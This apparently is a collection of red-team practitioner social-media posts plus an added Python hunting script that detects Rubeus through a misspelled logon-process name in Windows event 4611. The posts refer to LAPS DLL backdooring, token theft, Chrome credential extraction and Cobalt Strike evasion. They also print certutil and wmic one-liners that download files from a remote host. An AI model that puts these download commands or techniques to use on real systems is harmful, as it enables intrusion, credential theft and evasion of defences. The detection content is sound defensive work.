Found a funny way to detect Rubeus. There's a typo in the process name used when calling LsaRegisterLogonProcess, which shows up in the Windows audit logs. Not sure if that was intentional given the code comment right next to it.
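Detection logic for the point above, as an added example that is not part of the original post. A call to LsaRegisterLogonProcess produces Security event 4611 ("A trusted logon process has been registered with the Local Security Authority"), and its LogonProcessName field is the caller-supplied string. The misspelled value used here, "User32LogonProcesss" (three s's), is the one in the public Rubeus source and should be checked against the build you are hunting for; the allow-list of legitimate registrants, the record shape (EVTX exported to JSON) and the sample events are assumptions constructed for the example.

```python
"""Hunt Security event 4611 for the Rubeus logon-process-name typo.

Added example, not from the original post. Assumes events have already been
exported to dicts with at least EventID and LogonProcessName (the field names
below mirror the 4611 event data; the records themselves are constructed).
"""
from typing import Iterable, List, Optional

# Value as it appears in the public Rubeus source (LsaRegisterLogonProcess
# helper). Verify against the copy you care about; it is the whole signal.
RUBEUS_LOGON_PROCESS_NAME = "User32LogonProcesss"  # note the three s's

# Registrants you expect to see on a baseline host. This set is an assumption
# for the example; build yours from a baseline of 4611 events in your estate.
KNOWN_GOOD_LOGON_PROCESSES = {
    "Winlogon",
    "Schannel",
    "IKE",
    "Secondary Logon Service",
}

# Constructed sample records, shaped like EVTX records exported to JSON.
SAMPLE_EVENTS = [
    {"EventID": 4611, "Computer": "WS01", "SubjectUserName": "SYSTEM",
     "LogonProcessName": "Winlogon"},
    {"EventID": 4611, "Computer": "WS01", "SubjectUserName": "jdoe",
     "LogonProcessName": "User32LogonProcesss"},
    {"EventID": 4611, "Computer": "WS02", "SubjectUserName": "svc_backup",
     "LogonProcessName": "MyAgent"},
    # Same string in a different event ID: not a registration, must be ignored.
    {"EventID": 4624, "Computer": "WS01", "SubjectUserName": "jdoe",
     "LogonProcessName": "User32LogonProcesss"},
]


def classify(event: dict) -> Optional[str]:
    """Return 'rubeus', 'unknown', or None for one event record.

    Only 4611 carries a registration. Matching is exact on purpose: a
    substring check such as 'User32LogonProcess' in name would also accept
    the correctly spelled name and lose the one character that matters.
    """
    if event.get("EventID") != 4611:
        return None
    name = event.get("LogonProcessName", "")
    if name == RUBEUS_LOGON_PROCESS_NAME:
        return "rubeus"
    if name not in KNOWN_GOOD_LOGON_PROCESSES:
        # 4611 is rare and stable per host, so any unbaselined registrant
        # is worth a look even when it is not the Rubeus string.
        return "unknown"
    return None


def hunt(events: Iterable[dict]) -> List[dict]:
    """Run classify() over a stream of records and return the alerts."""
    alerts = []
    for ev in events:
        verdict = classify(ev)
        if verdict is not None:
            alerts.append({
                "verdict": verdict,
                "host": ev.get("Computer", "?"),
                "user": ev.get("SubjectUserName", "?"),
                "logon_process": ev.get("LogonProcessName", ""),
            })
    return alerts


if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(f"[{alert['verdict']}] {alert['host']} {alert['user']}: "
              f"LogonProcessName={alert['logon_process']!r}")
```

The same two checks translate directly into a SIEM rule: an exact match on the misspelled name is the high-confidence alert, and "4611 with a LogonProcessName outside the baseline" is the lower-confidence catch-all that also covers a fork of Rubeus that fixed the typo.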
Ok, pinvoke.dev is now live. A simple GitBook of code-generated P/Invoke signatures. Just C# for now, but I may add Rust and a few others in the future.
Using @rogue_kdc's CVE-2019-084 to backdoor the LAPS AdmPwd DLL and get code exec as SYSTEM on each Group Policy update.
Thanks to @_RythmStick for the idea of targeting LAPS for the priv esc.
I think I'm coming to the end of my infosec road. New features like admin protection dropping in Windows and instead of being excited/curious about something new to learn and bypass, I find myself just not remotely interested...
Would there be much interest in a livestream series of how to use Cobalt Strike, aimed at beginners?
Start simple and work up to more advanced tactics.
[BLOG]
I had a series in mind like "Rubeus' Hidden Secrets" or something like that. Basically, highlighting features of the tool that seem less well known. I'm starting off with a basic one for getting crackable hashes from cached service tickets.
rastamouse.me/kerberoasting-…
I wrote a short primer for transitioning from P/Invoke to D/Invoke in offensive tooling.
Shoutout to @TheRealWover and @FuzzySec
rastamouse.me/blog/process-i…
Kinda funny how I did Rust for n00bs and C# for n00bs, then TCM did Rust 101 and now C# 101. I was working on Assembly for n00bs but don't think I'll bother now, TCM can have it.
It's been a day for course releases. I've just published my own new mini-course on Windows Access Tokens.
This walks you through the essentials of enumerating, creating, stealing, modifying, and impersonating access tokens.
training.zeropointsecurity.c…
[BLOG]
Short post on using the Process Inject Kit in Cobalt Strike, which I feel is quite under-utilized based on the projects I've seen online.
offensivedefence.co.uk/posts…
I drafted a janky mind map of Beacon's components and their relationships. Might be able to make it neater if people find it useful. Perhaps we could get this on a desk mat @joehowwolf 😅
Working on this blog post, hopefully I can get it out very soon.
Huge props to @subTee on this one for answering all my noob questions and being generally awesome in every way.
New in Elastic Security 8.4: Native SOAR for the modern SOC gives users the ability to quickly disable network connectivity to infected systems while still allowing responders to investigate. See how it works: go.es.io/3AxAdXo
It seems Defender is now detecting the use of wmic and regsvr32 to grab files remotely. Crazy stuff.
(note: it doesn't even grab the payload, it's detecting what's entered on the cmdline. Even wmic os get /format:"http://blah" is flagged.)
[BLOG]
This post summarises how to tie Cobalt Strike's UDRL, SleepMask, and BeaconGate together for your syscall and call stack spoofing needs.
rastamouse.me/udrl-sleepmask…
Found the best tool ever for C# devs: CSharpRepl. A global dotnet tool that you can integrate into Windows Terminal. Now you have the power of Roslyn to quickly evaluate C# code in just a few seconds. Intellisense, tab completion and syntax highlighting. Simply orgasmic.
Check out my talk from Mystikcon. Five Ways I got Caught before Lunch.
A brief look at commonly used (bad) tradecraft and how to avoid it.
piped.video/qIbrozlf2wM
We're all gonna be fucked when companies adopt Windows 11 and Server 2025 properly. RunAsPPL and Credential Guard break so much stuff we take for granted.
Only recently learned that you can use certutil to download files.
certutil -urlcache -split -f http://file.txt c:\somewhere\file.txt
Thanks @_RythmStick for the tip.
I am of the opinion that the overall quality of tooling in infosec is quite low. As an industry we don't conform to any coding standards, documentation standards, security standards (ironically), or testing standards. It's pretty amazing that we get on as well as we do.
I got NtCreateUserProcess with PPID spoof and BlockDLLs working in C# (just P/Invoke for now).
Thanks everyone who assisted: @_Kudaes_, @vxunderground, @brian_psu and others. Great community effort 🙂
Wrote another little C# tool with @_RythmStick for extracting cookie and credential data from Chrome.
github.com/rasta-mouse/Cooki…
Hopefully we can add support for other browsers too.
We see RED 😡
With all the new #redteaming scenarios soon arriving on #HackTheBox, you will too! Catering to both beginners and pros, the total 15+ real-world scenarios will help you gain familiarity with attacking #enterprise infrastructures. Learn more: okt.to/ug6f7B
It's my birthday today 🍰, so I'm running a small 5% discount on Red Team Ops. Valid for today only.
The discount code is OLDRASTA.
zeropointsecurity.co.uk/red-…